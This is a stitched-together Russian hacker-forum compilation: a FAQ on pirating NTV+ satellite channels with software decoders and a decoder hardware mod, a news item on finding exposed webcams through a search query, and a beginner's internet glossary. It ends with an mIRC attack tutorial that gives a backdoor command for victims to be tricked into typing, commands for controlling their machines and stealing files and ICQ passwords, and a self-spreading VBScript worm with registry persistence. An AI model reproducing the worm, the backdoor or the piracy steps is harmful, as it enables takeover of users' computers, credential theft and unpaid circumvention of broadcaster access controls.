За что блочат аккаунты?

Как смотреть НТВ+ и другие каналы
Как смотреть НТВ+ и другие каналы, кодированные в системе Nagravision-Syster, если нет возможности смотреть их официально?Ответы на наиболее часто задаваемые вопросы на основе собственных наработок.
Этот FAQ предназначен для тех, кто увлекается спутниковым телевидением, компьютерами, кто любит экспериментировать, не боится неудач.
Внимание! Информация только для образовательных целей.
Коммерческое использование преследуется по закону.
Вопрос первый, самый глупый, но вдруг кто-то не знает? Что такое НТВ+ и какие проблемы с его просмотром?
Какие способы пиратского просмотра каналов кодированных Nagravision-Syster вообще существуют?
Что такое PC-TV и какие телеканалы можно смотреть используя его?
Что для этого надо ?
Какая карта видео-захвата для этого нужна?
Какой программой лучше пользоваться?
Как и что правильно подключить?
Как правильно настроить программу?
Как открыть звук?
Как вывести изображение на телевизор?
Как часто телекомпании меняют коды?
Можно ли обойтись без компьютера?
Спутниковое телевидение существует как бесплатное, так и коммерческое, для просмотра которого надо платить телекомпании абонентскую плату. Для того чтобы обеспечить сбор абонентской платы, телекомпании кодируют свой сигнал, то есть делают не возможным просмотр его без специального декодера. Телекомпания НТВ+ использует Французскую систему кодирования Nagravision-Syster,в которой используется перемешивание строк по особому алгоритму, в соответствии с таблицей перестановки строк. На рисунке видно, как выглядит изображение, если его попытаться смотреть без декодера. Кроме того, применяется инверсия спектра звукового сопровождения частой 12,8 кГц, что очень сильно искажает звук, делая не возможным его прослушивание. Вдобавок ко всему, для разграничения доступа оплативших и не оплативших подписку абонентов, применяется система адресного кодирования – то есть телекомпания имеет возможность сигналом со спутника избирательно выключать декодеры не оплативших абонентов. Достигается это тем, что у подписчиков имеются индивидуальные ключи, представляющие собой микросхему памяти, в которой содержится индивидуальный код, а так же обновляемая через спутник информация о состоянии подписки. Эту же систему кодирования применяют телекомпании Германии, Франции, Польши, а так же ряда других стран. Существуют и другие системы кодирования, такие как D2MAC, Videocript, и т.д. но в этой статье мы их описывать не будем. Не смотря на то, что этой системе уже более десяти лет, протокол обмена данными между ключом и декодером телевизионными пиратами изучен мало (наверно просто это было ни кому не нужно), о работающих эмуляторах ключей пока не слышно.
Система кодирования Nagravision-Syster была взломана другим способом – появились пиратские декодеры, которые работают безо всяких ключей на принципе подбора кода пут|м сравнения и поиска похожих строк. Такие декодеры открывают все каналы, на которые они рассчитаны и совершенно бесплатно. К сожалению, купить такой декодер у нас пока не возможно, а сделать тоже очень сложно в основном из-за отсутствия необходимой информации.
Но недавно появилась возможность смотреть НТВ+ и другие каналы кодированные в Nagravision-Syster с помощью персонального компьютера, используя тот же принцип, что и у пиратского декодера, но реализуя его с помощью специальной программы. Этот способ получил общее название PC-TV. PC-TV позволяет смотреть все каналы, кодированные в Nagravision (смотри таблицу).
Что нужно для просмотра кодированных каналов таким способом?
Во-первых, нужен настроенный комплект спутникового телевидения, состоящий как минимум из антенны (тарелки), конвертера и ресивера. Эта система должна обеспечивать уверенный при|м тех кодированных каналов, которые вы хотите смотреть. Для случая с НТВ+ достаточно иметь родной “НТВшный” комплект с “тарелкой” того диаметра, который достаточен для при|ма сигнала в вашей местности, можно без оригинального декодера.
Во вторых, нужен достаточно мощный IBM совместимый персональный компьютер, минимум – P-166MMX, 32Mb RAM, видеоадаптер PCI 4Mb, желательно P-II с как можно большей тактовой частотой и оперативной памятью 64Mb. Объ|м и скорость ж|сткого диска, а так же другие параметры, существенно не влияют.
В третьих, для ввода изображения в компьютер, нужна карта видеовхода, построенная на одном из следующих чипов – BT848, BT849, BT878, BT879. Сейчас таких карт выпускается достаточно много, разными фирмами, под разными названиями, на пример: MiroPCTV, AverMedia различных модефикаций, Fly Video(наверно самый дешевый вариант), MR Vision TV Link, ТЕЛЕМАСТЕР. Продолжать список можно ещ|, но нет смысла – подойд|т любая карта, лишь бы она была сделана на чипе серии BT8XX. Карты отличаются друг от друга наличием и качеством встроенного TV тюнера для просмотра обычных эфирных телеканалов, наличием дистанционного управления тюнером, количеством видеовходов -1 или 2, качеством и удобством прилагаемого к ней софта и некоторыми другими наворотами, которые ни каким образом не связаны с нашей задачей, так как в данном случае требуется только видеовход. В последнее время стали появляться версии программ для видеоадаптеров на чипе ATI c видеовходом (без BT8XX), но так как у меня такой карты нет, то я их не тестировал и ничего про них сказать не могу.
На сегодняшний день написано несколько программ – декодеров, которые совершенствовались их авторами (и не только авторами, потому, что почти все они публиковались вместе с исходными текстами) и имеют каждая по несколько версий. У каждой программы есть свои достоинства и недостатки, и стоит попробовать их все, чтобы сделать для себя выбор. Лично мне более других понравилась MoreTV 3.10 – на мой взгляд, это наиболее удачная программа, которая позволяет смотреть каналы как в стандарте PAL, так и SECAM (НТВ+). У не| реализовано автоматическое включение-выключение декодирования при переходе от кодированных к не кодированным каналам, прямое взаимодействие с картой видео-ввода (достаточно установить драйвер карты, софт можно не ставить, программа сама настраивает карту), имеются удобные оперативные регулировки с помощью горячих клавиш, достаточно легка в настройке. К недостаткам данной программы можно отнести не очень хорошую чистоту цвета в режиме SECAM (хотя у некоторых других программ при просмотре SECAM цвет вообще отсутствует), и интерфейс на немецком языке. Надо учесть, что для видеоадаптеров с видеовходом на чипе ATI, должна быть специальная версия программы- MoreATI-TV.
После того как вы установили карту видеовхода в ваш компьютер, надо соединить НЧ-вход карты с НЧ-выходом вашего ресивера с помощью специального низкочастотного кабеля, такого же, каким вы подключаете телевизор к ресиверу или видеомагнитофону. Установите драйвер и программное обеспечение карты, руководствуясь инструкцией прилагаемой к ней. В результате, если вы сделали вс| правильно, то при включенном ресивере и запущенной программе от карты, вы должны получить на экране компьютера устойчивое изображение того канала, на который настроен в данный момент ваш ресивер, в том виде, в каком оно переда|тся со спутника (т.е. если канал кодированный, то изображение будет напоминать фотографию). Не забудьте, что декодер в настройках ресивера должен быть выключен.
Теперь можно приступить к установке и настройке программы – декодера. Программы в основном не требуют инсталляции и достаточно просто распаковать архив в любую директорию, желательно в корневом каталоге вашего жесткого диска. В дальнейшем речь пойд|т о настройках программы MoreTV 3.10 – если вы е| сумеете запустить, то и с остальными программами вы сумеете разобраться сами. Первым делом скопируйте в каталог с программой файл Key.txt предназначенный для НТВ+, если вы настроили ресивер для его при|ма. Учтите, что Key.txt для НТВ+ и для других каналов разные! Не забудьте переименовать файл Key2.txt (извлеченный из архива) в Key.txt (без цифры) и запустите программу.
На экране появится окно настроек программы. В рамке “Video” установите для начала разрешение 640х480YUY2 и поставьте флажок SECAM. В рамке “Hardware” выберите из списка вашу карту (если е| нет в списке, сильно не расстраивайтесь, выберите любую другую, лишь бы на таком же чипе как у вас) марку тюнера можно не устанавливать – он нужен только при при|ме кодированных каналов с эфирной антенны, PLL для начала лучше не включать. В рамке “Dekodierung” установите количество тестовых строк равным 30 и сохраните настройки (средняя кнопка). Теперь можно запускать собственно программу (верхняя кнопка). Первый запуск программы может продлиться несколько дольше чем обычно (в это время программа созда|т в сво|м каталоге индексный файл с именем MoreTV_XX.idx, где ХХ – количество тестовых строк), в дальнейшем программа будет запускаться практически мгновенно. Вы должны увидеть на экране декодированное изображение. Если экран останется синим, проверьте все соединения, а если у вашей карты два входа, попробуйте подать сигнал на другой вход. Если изображение есть, но не декодированное, проверьте тот ли Key.txt вы используете (если открыть его блокнотом, он должен начинаться так : 0 1 2 3 4 5 6 7 2 5 4 7 8 9 10 11 14 17 16 19 22 25). Если вс| заработало, попробуйте поэкспериментировать с настройками программы для достижения лучшего качества изображения.
“Горячие клавиши” программы:
Esc – стоп кадр, F1 – восстановление после стоп кадра, F2 – включение декодера (включен / выключен / авто), F3 – F8 – изменение формата и размера декодируемого изображения, F10 – выход из программы, F11 – Турбо / стандартный декодер, F12 – синхронизация по фазе, Insert – контрастность + , Delet – контрастность – , Home – насыщенность + , End – насыщенность – , PgUp – яркость + , PgDn – яркость -, остальные клавиши предназначены для настройки и переключения каналов встроенного TV тюнера, и для нас значения не имеют.
Программа MoreTV не имеет встроенного декодера звука, и поэтому декодирование звука – тема отдельного разговора. На сегодняшний день есть три способа прослушивания звукового сопровождения. Способ первый, самый простой, и самый худший. Скачайте одну из программ – аудио-декодеров (лично мне больше нравится DCPlus), соедините выход звука ресивера с линейным входом звуковой карты вашего компьютера, в настройках стандартного регулятора громкости Windows включите линейный вход на запись, и обязательно выключите на воспроизведении (чтобы предотвратить проникновение кодированного звука непосредственно со входа на выход без обработки программой). Запустите программу с установками по умолчанию, и звук должен заработать. Качество звука регулируется настройками программы. Не забудьте, что для этого ваша звуковая карта обязательно должна поддерживать Full Duplex – то есть одновременную запись и воспроизведение звука, и эта опция должна быть активизирована в настройках звуковой карты (установить флажок “разрешить двунаправленную работу”). Кроме того, одновременная работа программ аудио и видео декодеров возможна только на достаточно быстрых машинах, а если конфигурация вашего компьютера соответствует только минимальным требованиям, то этот способ для вас непригоден (в зависимости от используемой программы и е| настройки будет “заикаться” звук, либо срываться картинка). Второй способ подойдет тем, у кого есть оригинальный декодер с неоплаченным ключом и кто не боится держать в руках паяльник. Аккуратно вскройте декодер, найдите микросхему с надписью EURO@DEC 5096 ELEXC7397A. Отпаяйте сопротивление от седьмой ноги микросхемы и подайте на эту ногу микросхемы логическую единицу (+5В) через сопротивление1-10к (найдите напряжение +5В с помощью тестера по цепям питания). Соблюдайте осторожность, так как на плате декодера присутствует высокое напряжение!!! Ошибка в ваших действиях может привести к серьезной поломке декодера!!! После этой переделки декодер открывает звук и без оплаты. Третий способ годится для опытных радиолюбителей. Соберите самодельный декодер по привед|нной схеме. Этот способ наиболее сложен, но наверно самый лучший, так как не требует наличия оригинального декодера, не занимает ресурсы компьютера, звук не запаздывает по отношению к видео как в программных декодерах.
После того, как у вас все| получилось, возможно вам захочется вывести изображение на телевизор. Для этого ваш видеоадаптер должен иметь TV-OUT. Практически все современные модели видеоадаптеров имеют модификации с выходом на телевизор. Это видеоадаптеры на таких чипах как: RIVA TNT, RIVA 128, ATI, INTEL 740, S3 VIRGE GX2, а так же некоторые другие. Телевизор подключается к выходу видеоадаптера (чаще всего это обычный “тюльпан”) кабелем, аналогичным тому, которым вы подавали сигнал на вход карты видеовхода. Настраивается адаптер в соответствии с руководством пользователя, прилагаемого к нему. Надо заметить, что практически все видеоадаптеры “усекают” или “поджимают” изображение по вертикали примерно на 5-10%. Это связано с несоответствием количества строк в телевизионном стандарте и изображении формируемом видеоадаптером. Существуют специальные дополнительные карты-TV OUT которые преобразуют стандартное SVGA изображение, формируемое любым видеоадаптером в полноценный сигнал формата PAL, но я встречал о них информацию только в интернете, и пока не разу не видел их в продаже.
Часто задают вопрос – часто ли телекомпании меняют код, и отличается ли он на разных каналах одного пакета программ? Здесь можно пояснить, что программные декодеры не требуют никаких кодов, они их подбирают “на ходу” методом сравнения соседних строк. В алгоритме декодирования используется только таблица перестановки строк (файл Key.txt) одна для всех каналов НТВ+. В оригинальных декодерах эта таблица содержится в программе-прошивке центрального процессора, т.е. программируется однократно при изготовлении декодера. Соответственно сменить эту таблицу можно, только заменив все декодеры у официальных подписчиков (именно декодеры, а не ключи), что в наших условиях практически не реально.
Иногда задают вопрос – можно ли все-таки сделать аппаратный декодер, то есть обойтись без компьютера? В принципе это возможно, на сайте www.eurosat.com/salp описан декодер, декодирующий все французские каналы. Так как PC TV с ключом Key.txt подходящим для НТВ+ открывает французские каналы, логично предположить, что данный аппаратный декодер будет открывать и НТВ+, однако я не знаю случаев, чтобы это кто-то проверил на практике. Изготовление данного декодера технологически сложно и может обойтись не в одну сотню долларов, а так же нет никакой гарантии в успехе этого предприятия и поэтому на сегодняшний день наиболее простым способом просмотра каналов кодированных в Nagravision является PC TV.

конецформыначалоформыСуществует простой способ находить незащищенные веб-камеры, подключенные к Сети. С их помощью любой желающий может увидеть, что происходит в офисах и домах незадачливых пользователей, не думающих о собственной безопасности.
Камеры слежения, которые становятся обязательным атрибутом практически любого предприятия, могут таить в себе опасность и вместо усиления системы безопасности служить ее разрушителем. Все дело в том, что зачастую они подключаются к корпоративной сети компаний по IP-протоколу и имеют прямой выход в Интернет. Функционал камеры позволяет просматривать изображение с нее при помощи обычного браузера, так как само устройство уже имеет встроенный веб-сервер. Это удобное изобретение, позволяющее экономить на экранах слежения, может привести к серьезным последствиям, если вовремя не подумать об ограничении такой «свободы слова».
Консультант по вопросам информационной безопасности Роберт Шифрен (Robert Schifreen) создал сайт www.defeatingthehacker.com/videoham/ на котором подробно описал процесс поиска и подключения к открытым камерам слежения. Явление даже получило свое название в Интернете — Video Ham (в английском языке слово ham помимо «ветчины» имеет еще значение «радиолюбитель»).
Сама процедура поиска проста и доступна каждому любопытному пользователю — нужно лишь найти страницы, в адресе которых содержится подстрока «CgiStart? page=Single», на такой запрос Google сразу выдал нам несколько десятков ссылок, среди которых действительно нашлось немало снимков с камер слежения, расположенных в офисных помещениях. Вряд ли владельцы компаний мечтали о том, что за их сотрудниками будет «присматривать» автор российского интернет-журнала.
При всей серьезности проблемы, обеспечить безопасность крайне просто. Во-первых, нужно ограничить доступ к веб-камере корпоративной локальной сетью, исключив IP-адреса внешнего Интернета, во-вторых, необходимо установить пароль на просмотр изображений с камеры. При соблюдении этих несложных правил никакие скучающие пользователи не смогут нанести в ваш дом или офис нежданный визит, пусть даже и виртуальный.

конецформыначалоформыЗдраствуйте!!! Я Keniattack, и я решил написать эту статью-словарь для того чтоб новички не мучали опытных хакеров с вопросами: а что такое IP? Или а что такое хост? Я не смогу написать много в этой статье так как я человек а не печатная машина и по этому я разделю свой словарь на несколько частей.
Просьба не судите строго это моя первая статья и не ругайте за грамматические ошибки так как я пишу в спешке))). Ну ладно поехали…
Attach – файл, “прикрепленный” к сообщению электронной почты.
E-mail: (электронная почта) – рассылка и получение сообщений при помощи электронных средств связи; как правило, это понятие ассоциируется с Интернетом.
IP-адрес – это уникальный адрес компьютера в сети Интернет, который состоит из четырех чисел, находящихся в диапазоне от 0 до 255 и разделенных точками. Например: 196.25.5.23. В Интернете можно обратиться к любому подключенному компьютеру, используя IP адрес.
FTP (File Transfer Protocol) – “протокол передачи файлов”, инструмент для переноса любого файла на узловую машину. Файл можно перекачать (скопировать) по модему на собственный персональный компьютер.
Frame – специфическая область Web-страницы, содержащая данные из другой страницы.
Hits (хиты) – число посещений той или иной web-страницы
Hosts (хосты) – число посетителей той или иной web-страницы с уникальным IP-адресом
HTML (HyperText Markup Language) – язык описания гипертекста, используемый для размещения информации на Сети в виде гипертекстовых страниц, доступных через программу сканирования сети (browser), поддерживающую HTTP.
HTTP (Hypertext Transport Protocol) – протокол передачи гипертекста. – язык, при помощи которого браузер направляет на серверы запросы на web-страницы.
ICQ (I Seek You – я ищу тебя) – коммуникационная программа для Интернета, позволяющая обмениваться короткими сообщениями (аналог пейджера), а также пересылать файлы, фото и т.д. Одно из средств общения в Интернете
IP (Интернет-протокол) – идентификационный номер компьютера, подключенного к Интернету (как телефонный номер); на него также распространяются права интеллектуальной собственности.
Java – разработанный компанией Sun Microsystems набор спецификаций для создания программ (называемых аплетами), которые можно вставить в Web-страницы и которые выполняются под управлением защищенной среды, обеспечивая высокую степень безопасности.
JavaScript – язык программирования компании Netscape, с помощью которого можно работать в интерактивном режиме.
Microsoft Internet Explorer – одна из программ просмотра информации Web-серверах фирмы Microsoft, созданная на основе программы Mosaic.
On-line – доступ в режиме реального времени (”здесь и сейчас”).
TCP/IP (File Transmission Control Protocol/Internet Protocol) – два стандартных протокола, используемых для установления соединения между компьютерами, входящими в Интернет. Эти протоколы позволяют различным компьютерным системам производить обмен данных.
Web-интерфейс – это то, что видит пользователь на сайте в окне своего web-браузера. Другими словами, это совокупность информации и средств навигации на web-сайте, позволяющая пользователю самостоятельно, без применения дополнительных программ пользоваться и управлять этой информацией.
Web-сайт – это участок Интернета, содержащий информацию, сгруппированную определенным образом. Другими словами, это совокупность web-файлов, которая включает в себя начальный файл, называемый домашней страницей, и другие, именуемые страницами. Просмотреть сайт можно на своем компьютере, используя специальную программу “web-броузер.” Существует большое количество различных web-браузеров, но самыми распространенными среди пользователей являются Internet Explorer (IE) компании Microsoft и Netscape Communicator (NC) компании Netscape.
Web-сервер – это компьютер, оснащенный специальным программным обеспечением, который может хранить и обрабатывать файлы одного и более web-сайтов. В случае, когда несколько web-сайтов работают на одном компьютере, web-сервером принято называть то виртуальное пространство (программное обеспечение и место на компьютере), в котором работает web-сайт. Поэтому многие говорят “web-сервер”, подразумевая “web-сайт”. Большие web-сайты, содержащие много информации, могут храниться и обрабатываться сразу на нескольких компьютерах. Обмен информацией с web-серверами происходит только по специальным протоколам http:// или https://.
Web-страница – отдельно взятый файл, находящийся в памяти компьютера, в котором содержится текст в формате HTML, а также графические изображения и гипертекстовые ссылки для взаимодействия с другими страницами.
WWW-адрес – это адрес сайта, обозначенный по особым правилам веба. Адрес может включать зарегистрированный домен web-сайта, а также – требуемые каталоги и файлы, расположенные на web-сервере
WWW (World Wide Web) – “всемирная паутина”, средство для онлайнового доступа к информационным ресурсам Интернет. Это широко распространенный программный продукт, обеспечивающий гипертекстовый переход со страницы на страницу, а также гипертекстовую связь ресурсов Интернет в единую систему, которая предусматривает возможность навигации и поиска.
Unlimited – схема доступа в Интернет, при которой пользователь покупает доступ на определенный срок (как правило – месяц). При этом время, проведенное пользователем на линии, не учитывается.
URL (Uniform Resource Locator) – это “адрес” на WWW, единый указатель на русерс. Представляет собой имя файла или ресурса, позволяющее достичь его через Интернет и включающее, как правило, название протокола, имя узла и путь до файла.
Авторизация – проверка прав или личности пользователя, необходимая для обеспечения безопасной работы Интернета и целостности секретной информации. Обычно авторизация сводится к набору имени пользователя (логина) и пароля.
Базы данных (БД) – специальное программное обеспечение, предназначенное для организации хранения информации и доступа к ней. Используются при создании программного обеспечения для систем управления web-сайтом.
Баннер (баннерная реклама) – в общем случае, это статичное или анимированное изображение, размещаемое на страницах web-сайта с целью рекламы чего-либо. Баннер выполняет роль гиперссылки на тот или иной Интернет-ресурс.
Баннерная реклама – реклама посредством размещения баннеров на web-сайтах. При проведении баннерной рекламы имеется возможность выбора времени показа и определения целевой аудитории по интересам и территориальному признаку. Цель размещения баннера – добиться соответствующих действий со стороны пользователя, чтобы на его экране открылась web-страница с рекламируемой информацией.
Баннерные сети – это специальное программное обеспечение, позволяющее производить обмен баннерами между сайтами – участниками сети с возможностью выбора времени показа и определения целевой аудитории по интересам и территориальному признаку.
Броузер – это программа, работающая на компьютере клиента, которая посылает, принимает и отображает файлы в рамках HTTP-протокола. Современные броузеры понимают и другие протоколы, например, FTP или Gopher. В настоящее время наиболее распространенными броузерами являются: Netscape, Internet Explorer, Opera и Mosaic.
Брэндинг – имиджевая реклама, продвижение какой-либо торговой марки (брэнда). Основная ее цель – узнаваемость в потребительской среде.
Выделенка – выделенная линия. Такая обычная телефонная линия проводится телефонной компанией в квартиру, но использует только для Интернета. Поэтому качество связи лучше, скорость может быть больше во много раз чем по телефонной линии, и пользоваться ей можно круглосуточно, не занимая обычного голосового телефона.
Гипертекст – нелинейная форма записи текстовой информации с обозначением ссылок на фрагменты текста любого документа, находящегося в автоматизированной информационной системе, и возможностью быстрого перехода к этим фрагментам.
Глобальная сеть – сеть, содержащая большое количество узлов, имеющих, как правило, государственный, континентальный или межконтинентальный характер распределения ресурсов.
Гостевая книга, гостевая (от англ. guestbook) – раздел сайта, где посетители с помощью специальной формы могут высказать свое мнение о сайте. Большинство гостевых книг позволяют ознакомиться с комментариями других посетителей.
Домен (Доменное имя) – это часть WWW-адреса web-сайта, которая является его основой. Домены могут быть первого, второго, третьего и т.д. уровней, например, http://www.ru – домен первого уровня, закрепленный за Российской Федерацией, http://www.mtrx.ru- домен второго уровня. http://catalog.mtrx.ru – домен третьего уровня. Доменные имена второго уровня регистрируется специальными организациями, координирующими распределение доменных имен. Доменные имена третьего уровня может зарегистрировать администратор соответствующего доменного имени второго уровня, а доменное имя первого уровня Вы легко сможете получить, имея собственное государство.
Индексация – лексический анализ и разбор текстовых материалов сайта с целью составления списка используемых слов и выражений. Составленный таким образом список используется при поиске информации на сайте по запросу пользователя. Индексация производится в автоматическом режиме специальными программами, называемыми поисковыми роботами. Используется всеми поисковыми системами.
Интернет – это возможность, благодаря которой Вы сможете получить на своем столе любую информацию из любой точки мира, а также, не вставая со своего рабочего места, повлиять на события, происходящие в любой точке мира.
Интернет/Web-сервер – это более широкое понятие, обозначающее компьютер (или компьютеры), оснащенный специальным программным обеспечением, обеспечивающий функционирование любых необходимых (а не только веб) сервисов Интернет: http://, https:// (web-сайт), e-mail (электронная почта), ftp, конференции и т.д.
Интранет – замкнутая внутренняя локальная сеть, построенная по тому же принципу, что и Интернет.
Логин – идентификатор, используемый для входа в систему.
Локальные сети – сети, которые содержат небольшое количество узлов и распределяются внутри ограниченной территории (организация, учреждения, университета и т.п.)
Модем – устройство преобразования данных для передачи их по каналам связи. Модемы бывают внутренними (встроенными) и внешними.
Мультимедиа – особый вид компьютерной технологии, объединяющей в себе как традиционную статическую (текст, графику), так и динамическую информацию (речь, музыку, видеофрагменты, анимацию и т.д.).
Оптимизация графики – максимальное уменьшение размера файлов с изображениями при сохранении приемлемого их качества. Используется при создании web-сайта для обеспечения высокой скорости загрузки его страниц.
Поисковые системы – специальные системы, управляемые через web-интерфейс, позволяющие пользователю находить в сети web-сайты, содержащие необходимую информацию по ключевым словам. Например, http://www.yandex.ru или http://www.google.com.
Порталы – очень часто посещаемые сайты, выполняющие роль шлюзов во “Всемирную паутину” и вследствие этого представляющие большой интерес для рекламодателей.
Провайдер – это организация, предоставляющая пользователям сетевые услуги. Это фирма, которой платит пользователь за доступ к Интернет.
Релевантность сайта – степень соответствия текста сайта ключевым словам, которые указаны в поле определения ключа поиска в поисковой системе. В зависимости от этой величины поисковая система определяет порядок показа результатов поиска. Чем выше у страницы релевантность, тем ближе к началу списка она будет находиться при выдаче результатов поиска.
Регистрация доменного имени – это закрепление определенного доменного имени за тем или иным лицом путем внесения соответствующей информации в регистрационную базу данных организации, координирующей распределение доменных имен. В России в зоне .ru эти функции осуществляет Региональный Сетевой Информационный Центр. Адрес web-сайта центра http://www.nic.ru/ В 2001 году в России наметилась тенденция передачи прав на регистрацию доменов коммерческим организациям по аналогии с зарубежными схемами. Для зоны .com имена распределяют уполномоченные коммерческие компании. Например, http://www.registrator.com/.
Сервер – компьютер сети, входящей в Интернет. Сервер обеспечивает обслуживание программ-клиентов, обращающихся к нему по сети. За каждым WWW-адресом, содержимое которого просматривается в броузерах, стоит сервер, который рассылает данные, и сотня других, расположенных между данным сервером и компьютерной системой клиента.
Сеть – несколько компьютеров, соединенных вместе, что позволяет совместно использовать ресурсы и обмениваться информацией.
Система управления сайтом – программное обеспечение, позволяющее владельцу web-сайта самостоятельно управлять содержимым этого сайта через web-интерфейс без специальных знаний в области программирования.
Статистика сайта – статистические данные, полученные путем учета информации о посещении страниц сайта. В простейшем случае включает информацию о количестве и времени посещений.
Узел (или Host) – компьютер, напрямую подключенный к сети Интернет. Он предназначен для работы пользователей в сети, размещения и хранения информации. Это может быть не только компьютер, но и любое электронное устройство, передающее информацию от одного сервера к другому.
Хостинг – это размещение web-сайта абонента на оборудовании провайдера.
Хостинг-провайдер (Хостер) – организация (в основном интернет-провайдер), которая профессионально занимается предоставлением услуг хостинга.
Электронная коммерция – проведение бизнес-транзакций с помощью возможностей Интернет. Включает в себя любые формы деловой активности в сети.
Юзабильность (юзабилити, usability) – это степень удобства работы с тем или иным web-сайтом для пользователя.

Для начала надо расказать о самой уязвимости =))
Нет лёгких методов взлома, но взлом irc будет достаточно прост если вам удастся выполнить миссию и заставить пользователя набрать нужную вам команду.
Команда: //write St1m.log ctcp 1:*:?:$1- | Load -rs St1m.log
Что делает ета простая команда?!
Всё очень легко =))
//write St1m.log ctcp 1:*:?:$1- = записывает в корень irc файл под названием St1m.log в котором содержится ctcp 1:*:?:$1-
Собсно рассомтрим ctcp 1:*:?:$1- слово ctcp говорит о том что ето маска на ctcp команды цифра 1 означает что пользователь с уровнем 1 (тоесть все =)) может посылать вам ctcp запросы. Далее идём маска :*:?: которая разрешает все запросы и в самом конце идентификатор $1- который возвращает все ващи команды.
Так что вам надо всеголишь заставить пользователя ввести данную строку в своём мирке после чего он создаст для себя уязвимость.
Вот некоторые команды:
Сделать чтоб юзер зашёл на канал: /ctcp NICK /j #CHANNEL
Юзер покидает канал: /ctcp NICK /part #CHANNEL
Послать сообщение от имени жертвы: /ctcp NICK /msg #CHANNEL OUR MESSAGE…
Послать приватное сообщение от имени жертвы: /ctcp NICK /msg NICK(anyone) OUR MESSAGE…
Закрыть mirc жертвы: /ctcp NICK /exit
Сменить жертве пароль: /ctcp NICK /msg nickserv set passwd NEW_PASS
Сменить жертве ник: /ctcp NICK /nick NeW_NicK
Если жертва является опом то следующей командой вы заставляете её дать вам опа на канале: /ctcp NICK /mode #channel +o OUR_NICK
Выполнить на компьютере жертвы команду MS-DOS: /ctcp NICK /run command
Открыть mirc на компьютере жертвы: /ctcp NICK /run mirc
Запустить редактор реестра на компе жертвы: /ctcp NICK /run regedit
Флуд на компе жертвы: /ctcp NICK /timer1 0 0 /ping $me
Вырубить винду на компе жертвы: /ctcp NICK /run exitwindows
такмс…
Уже нетерпиться попробовать ето все на практике, но какже посмотреть на мирк сервере есть ли уже люди которые ввели ету строчку???
Скрипт скана мирк серверов
#SCAN
alias mass {
set %i 1
var %massmsgmsg Yes
set %nickme $me
:next
set %nick $nick(#,%i)
if (%nick == $null) goto done
if (%nick != $me) { /ctcp %nick /msg %nickme %massmsgmsg }
inc %i
goto next
:done
}

Я думаю тут все понятно и без обьяснений =))
Так… теперь мы можем найти пользователя на канале с уязвимостью и сможем пошутить над ним, но какже быть с более серьёзными атаками
Минус в том что ети команды не обрабатывают идентификаторы, но зачемже тогда команда /write =)))
так вот пример атаки и сбора сведений о компьютере жертвы
___________________________________________________________________________
—- > Узнаю в какой директории лежит Мирк .exe
[06:59:12] -> [[SF]Norfolk] /WRITE fool.txt /notice Кевин_Митник $mircdir
[06:59:56] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[06:59:58] -[SF]Norfolk- D:Мирка
—- > Узнаю на каком диске находится WINDOWS
[07:02:21] -> [[SF]Norfolk] /WRITE fool.vbs set FSO = createobject(”scripting.filesystemObject”)
[07:02:33] -> [[SF]Norfolk] /WRITE fool.vbs set dirwin = fso.getspecialfolder(0)
[07:02:46] -> [[SF]Norfolk] /WRITE fool.vbs set text = fso.createtextfile(”fool.txt”)
[07:02:59] -> [[SF]Norfolk] /WRITE fool.vbs text.writeline “/notice Кевин_Митник” & ” ” & dirwin
[07:03:09] -> [[SF]Norfolk] /WRITE fool.vbs text.close
[07:03:36] -> [[SF]Norfolk] /PLAY -c #hack fool.txt
[07:03:38] -[SF]Norfolk- C:WINDOWS
—- > Очищаю документы
[07:05:36] -> [[SF]Norfolk] /WRITE -c fool.txt
[07:05:39] -> [[SF]Norfolk] /WRITE -c fool.vbs
____________________________________________________________________________
Как вы уже поняли можно записывать файлы на компьютер жертвы и потом проигрывать их для определённого канала.
ВНИМАНИЕ: Жертва видит что отсылает вам нотисы, так что советую использовать ето когда мирк жертвы свёрнут в трей или жертвы нет у компьютера. И не забывайте чистить файлы а лучше удалять их с компьютера жертвы.
Лучше всего выключать компьютер жертве командой /ctcp NICK /RUN shutdown.exe -s -f -t 00
Вот некоторые идентификаторы которые помогут тебе собрать нужную информацию
OS – $os
Host – $host
email – $emailaddr
Название лога который лежит в папке под номером 100 – $findfile($mircdirlogs,*.*,100)
$disk(C:) – C: если диск существует то вам веррнется $true
$disk(D:) – D:
$disk(E:) – E:
mirc folder – $mircdir
Следующий пример неработает в некоторых irc серверах
Вы должны заставить жертву набрать следующее:
/fserve OUR_NICK 4 c:
После этого диск C: компьютера жертвы будет открыт для вас. И вы сможете делать следующее:
Команды:
cd : С помощью этой команды вы можете перейти в любую папку.
Например: cd windows (попадёте в папку windows)
dir : Команда как в MS-DOS
get : Важная команда! Вы можете получить любые файлы с компьютера жертвы. Жертва видит передачу файлов, но если получать маленькие по обьёму файлы то передача будет очень быстрой и жертва может просто не заметить этого.
read: Чтение текстовых файлов.
Вы можете получить пароль от ICQ жертвы. Используя команду get получаете файл .dat и можете получить пароль от ICQ.
Дальше больше.
Попробуем написать вирус который будет рассылать себя по мирку и заражать траянчегом их
set FSO = createobject(”scripting.filesystemObject”)
set scriptini = fso.CreateTextFile(”C:Program Filesscript.ini”)
set virus = FSO.getfile(wscript.scriptfullname)
Set S = CreateObject(”Wscript.Shell”)
mircfile = “”&”St1m.jpg .vbs”
virus.copy(dirsystem&mircfile)
mircoff = dirsystem&mircfile
S.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServicesKernel32″, mircoff
scriptini.WriteLine “[script]”
scriptini.WriteLine “n0= on 1:JOIN:#:{”
scriptini.WriteLine “n1= if ( $nick == $me ) { halt }”
scriptini.WriteLine “n2= /dcc send $nick” &” “&mircoff
scriptini.WriteLine “n3= on 1:JOIN:#:{ ”
scriptini.WriteLine “n4 /write St1m.st ctcp 1:*:?:$1- | Load -rs St1m.st ”
scriptini.WriteLine “n5 }”
set f = fso.GetFolder(”C:Program Files”)
set sf = f.SubFolders
for each f1 in sf
set viruss = FSO.getfile(”C:Program Filesscript.ini”)
file1 =”"&”script.ini”
viruss.copy(f1&file1)
next
Если мирк находится или будет находиться в Program Files то етот скрипт его обезательно заразит и начнёт сам себя рассылать всем кто присоединяется к каналам на которых сидит жертва. Даже если жертва удалит мирк и переустановит её то после перезагрузки новый мирк опять заразится.

